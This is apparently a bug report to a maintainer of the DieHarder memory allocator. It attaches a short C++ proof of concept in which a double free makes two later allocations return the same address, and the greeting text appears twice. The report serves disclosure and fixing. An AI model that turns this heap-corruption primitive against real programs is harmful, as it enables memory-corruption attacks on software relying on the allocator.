Hi. Emery.
This is the issue for Dieharder that we discussed.
I am making this issue to keep track it for further discussion.
I also attached the PoC that you further minimized.
Thank you.
#include <iostream>
using namespace std;
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifndef __APPLE__
#include <malloc.h>
#endif
#include <assert.h>
void* p[256];
uintptr_t buf[256];
int main() {
#ifndef __APPLE__
p[1] = malloc((65536 + 16) / 2);
#endif
p[2] = malloc(65536 + 16);
free(p[2]);
p[4] = malloc(0x30000);
////// free(p[1]);
// Check we don't free a legitimate memory
assert(p[2] != p[4] && p[2] != p[4]); /// Emery: this assertion is redundant -- you only need one clause.
// [VULN] Double free
free(p[2]);
///p[5] = malloc(65536);
p[6] = malloc(65536 + 16);
free(p[4]);
p[7] = malloc(65536 + 16);
// [BUG] Found overlap
// p[7]=0x7f52347c4000 (size=65568), p[6]=0x7f52347c4000 (size=65552)
cout << p[6] << ", " << p[7] << endl;
assert(p[6] == p[7]);
}
Hi. Emery.
This is the issue for Dieharder that we discussed.
I am making this issue to keep track it for further discussion.
I also attached the PoC that you further minimized.
Thank you.